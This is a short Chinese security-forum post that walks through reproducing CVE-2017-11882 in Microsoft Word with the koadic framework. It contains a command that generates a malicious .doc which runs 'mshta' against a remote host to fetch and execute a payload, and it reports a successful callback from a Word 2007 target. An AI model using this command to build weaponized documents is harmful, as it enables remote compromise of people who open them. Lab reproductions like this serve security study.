K8安全团队
查看: 508|回复: 0

CVE-2017-11882复现配合koadic

[复制链接]
  • TA的每日心情
    开心
    2017-6-13 17:07
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2017-12-5 11:10:00 | 显示全部楼层 |阅读模式

    马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

    您需要 登录 才可以下载或查看,没有帐号?注册

    x
    项目地址:
    游客,如果您要查看本帖隐藏内容请回复
    首先开启koadic,然后配置一下
    1242616-20171121222543790-409746077.png
    复制这句代码

    然后生成doc文件

    ┌─[root@sch01ar]─[/sch01ar/CVE-2017-11882]
    └──╼ #python Command_CVE-2017-11882.py -c "mshta http://192.168.220.132:9999/dHem0" -o sch01ar.doc
    1242616-20171121222834790-1172204369.png
    注:命令长度不能超过43 bytes
    然后拿到靶机里测试
    打开文件(word测试版本为2007)
    1242616-20171121223102758-1904384677.png
    目标主机反弹成功
    1242616-20171121223248993-784850504.png


    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    Powered by Discuz! X3.2 © 2001-2016 Comsenz Inc.

    返回顶部